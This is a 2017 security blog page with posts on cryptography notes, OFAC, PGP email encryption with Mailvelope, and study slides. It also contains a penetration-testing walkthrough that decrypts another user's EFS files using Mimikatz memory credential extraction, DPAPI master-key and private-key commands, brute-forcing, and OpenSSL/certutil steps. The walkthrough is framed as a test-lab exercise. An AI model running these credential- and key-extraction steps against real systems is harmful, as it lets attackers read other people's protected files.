Saturday 28 January 2017

Cryptography Mind Map


Hi,

Sharing my Crypto Mind Map for quick reference.




























Download from here


Hope this helps!

Friday 27 January 2017

Office of Foreign Asset Control (OFAC)


Office of Foreign Asset Control (OFAC)

The Office of Foreign Assets Control (OFAC) is a financial intelligence and enforcement agency of the U.S. Treasury Department.

Financial institutions uses data/list provided by OFAC here
This OFAC  is the list of individuals, groups, and entities, such as terrorists and narcotics traffickers designated under programs that are not country-specific - https://www.treasury.gov

May be helpful !

Thursday 19 January 2017

Using PGP for Gmail - (Pretty Good Privacy)

What is PGP?

Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication.

PGP is often used for signing, encrypting, and decrypting texts, e-mails and increase the security of e-mail communications.



Public Key :
This key is public to everyone, you need to share your public keys with your friends, so that your friends will be able to encrypt the message and send it to you.

Private Key:
This key is private, and you should not share this key with anyone. You will be able to decrypt emails encrypted with your public keys.

For demonstration we will use - Mailvelope

Mailvelope is a crome plugin that can be used for generating public key and private key.
and also you will be able to send PGP encrypted / decrypt emails to and from your friends.


Link
























Steps :

1. Generate public and private keys with Mailvelope




















2. View your public and private keys










3. Now you need to import your friends Public key so that you can encrypt confidential message and send it to him


















4. Now You can compose a message and encrypt it with your friends public key
You just need to put your sender whose public key you have imported in previous step.












5. Even if other person intercepts this message he will see below contents






6. Now when your friend will open the message he will see below Mailvelope option for decrypting this message

Your friend will enter passphrase for his private key

















7. Thats it! Your friend has decrypted your message with his private key.




Hope this helps!



Tuesday 17 January 2017

Decrypting EFS encrypted Files


Recently came across scenario on decryption of EFS ( Encrypted File System) encrypted files. Encrypted File System (EFS) is a Microsoft Windows feature for encrypting files nad folders on NTFS drives.

How to encrypt a file ?
Its simple, just follow below steps,

Encrypting folder name 'Encrypt' with user 'Administrator'

















Attempt to access file with user 'admin'














Now its clear, that only user who encrypted the file can decrypt it!..

In your penetration testing, you must get an administrator level access the system for decryption of EFS files.


Possible Ways,

Step 1 : Using 'Cipher' command in Windows, you can encrypt / decrypt files, view encrypted file information and use it further for your attacks, I have executed below command with user 'admin' which is administrator account on the system and found that files are encrypted by user named 'Administrator' - That's what important to us!

Using Cipher command to know information about encrypted file















Case 1 :  Once you have administrator level access to the system, I would suggest,
1.  Extract system passwords from memory with Mimikatz, and get the password for account 'Administrator' ( Password for user which encrypted the file) ,
2. Authenticate over SMB and access EFS encrypted files just like normal files . - This is of course simple trick.


Case 2 : I also tried changing 'administrator' password from account 'admin' and it works, you can just login with your new password and still be able to access EFS encrypted files - So no dependencies even if password is changed.

Case 3: What if  because of some reason, you are not able to extract windows password from system memory, or what if system access is configured via SmartCard, you may not find domain passwords/local administrator passwords in system memory.

In this case 3, it becomes a challenge, because you dont have valid password for the account 'Administrator' and hence it wont be possible to access EFS encrypted files directly even via other administrator user name 'admin'


Now in this case, there are two approaches,

1. Using 'admin' credentials attempt to execute Mimikatz::Crypto commands mentioned below
 -  https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
( This is quite complex process but yes you can definitely follow the steps and attempt to recover your keys )

2. Using 'admin' credentials - Install a tool "Advanced EFS Data Recovery Tool" - Its commercial      (https://www.elcomsoft.com/aefsdr.html)

Using this tool, you will be able to identify EFS encrypted files throughout disk, and find following two important keys :
- Private Key
- Master Key


Private key is encrypted with Master key.
In order to decrypt this Master key we need to conduct bruteforce attack.
Usually password is -
- User account password
- Same key as a password



Here are some of the POC which I simulated in my test environment.


"Maliciousadmin" user doesnt have access to encrypted file - Create by Other user













"Malicousadmin" installs EFS recovers
























Scanning for Private/Master keys and Encrypted files













Launching Bruteforce attack against Master key











Launching Bruteforce attack























Decrypted Keys - Now can be used for decrypting files





















Files Decrypted with "malicioususer" 



Hope this was helpful!












Decry pt the EFS encrypted file a bit hard way :

Step 1: Login with userid "malicioususer" -

Step 2: In our scenario we need to extract keys for user "admin" who has encrypted the confidential file.
For this, we need to navigate to

"C:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<file name>

Step 3:  Running crypto:system on above file path results in generation of Public Key in a filename with extension .der














Step 4:


Encrypted Private Key

Confirming the private key 

Extracting Master Key



Decrypted Master Key














Decrypting Private key with master key














Export private key to .pvk file














Extracting Certificate










Importing Certificate and Decrypted EFS encrypted file















Path Details :  (Reference : Link )

Public Key Path :
C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D0180B88439A31CB850E1AAF6091B6006C0F2E9F

O/P = D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der

Private Key Path :
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7

O/P = b9fd6a85-6138-4a2b-98be-3acb31f7779b

Confirm Private Key and get master key requires Path :
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3064908807-4107569833-3502535929-1000

O/P = {9d684db5-a8a9-4193-b364-5c270f321408}



All Required Keys :

Public Key  - D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der

Private Key - b9fd6a85-6138-4a2b-98be-3acb31f7779b

Master Key  - {9d684db5-a8a9-4193-b364-5c270f321408}


Key Extraction :
Extracting Public Keys : (Stored in .DER file )

mimikatz # crypto::system /file:"C:\Users\admin\AppData\Roaming\Microsoft\System
Certificates\My\Certificates\D0180B88439A31CB850E1AAF6091B6006C0F2E9F" /export

Extracting Private Keys :

mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\
S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_
e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7"

Extracting Master Keys :

mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protec
t\S-1-5-21-3064908807-4107569833-3502535929-1000\9d684db5-a8a9-4193-b364-5c270f3
21408"

Decrypt Master Keys : ( Password Required )

mimikatz # dpapi::masterkey /in:"C:\Users\admin\AppData\Roaming\Microsoft\Protec
t\S-1-5-21-3064908807-4107569833-3502535929-1000\9d684db5-a8a9-4193-b364-5c270f3
21408" /password:test@123

Decrypt Private Keys : (Store in .pvk file)

mimikatz # dpapi::capi /in:"C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\
S-1-5-21-3064908807-4107569833-3502535929-1000\5a4d2e06b944070e8dd6cffc489cf70e_
e9e8e1d7-f64e-4e1f-879f-5d5a9f4fabe7" /masterkey:0f2d0b68ebd591f4feab3366a947672
d0886dc6a


Building the PFX - This requires OpenSSL v 1.x

Download from : Link

openssl x509 -inform DER -outform PEM -in C:\OpenSSL-Win32\D0180B88439A31CB850E1AAF6091B6006C0F2E9F.der -out C:\OpenSSL-Win32\public.pem

openssl rsa -inform PVK -outform PEM -in C:\OpenSSL-Win32\raw_exchange_capi_0_b9fd6a85-6138-4a2b-98be-3acb31f7779b.pvk -out C:\OpenSSL-Win32\private.pem

openssl pkcs12 -in C:\OpenSSL-Win32\public.pem -inkey C:\OpenSSL-Win32\private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\OpenSSL-Win32\cert.pfx



Importing Certificate :

certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot



Reference :https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files

I know its already available but wanted to replicate it on my test environment!

Hope this is helpful.



Sunday 15 January 2017

Quick Reference

Hi All,

Adding my updated quick reference slides on following topics : Quick Reference v0.3

  1. Law systems
  2. Intellectual Property Law (IPL)
  3. International Issues
  4. Safe Harbor
  5. Wassenaar Arrangement
  6. US Laws
  7. Risk Analysis Types
  8. Asset Types

21-01-2017 
New slides on following topics,
  1. Information Classification
  2. Data Management
  3. Quality Assurance and Quality Control
  4. Data Quality
  5. International Standards
  6. CISI
  7. Degausser Devices
  8. PGP - Pretty Good Privacy
  9. TOGAF

28-01-2017

  1. Security models
  2. Cryptography

Hope this quick references will be helpful ! 

Do let me know in case it needs to be updated. Thanks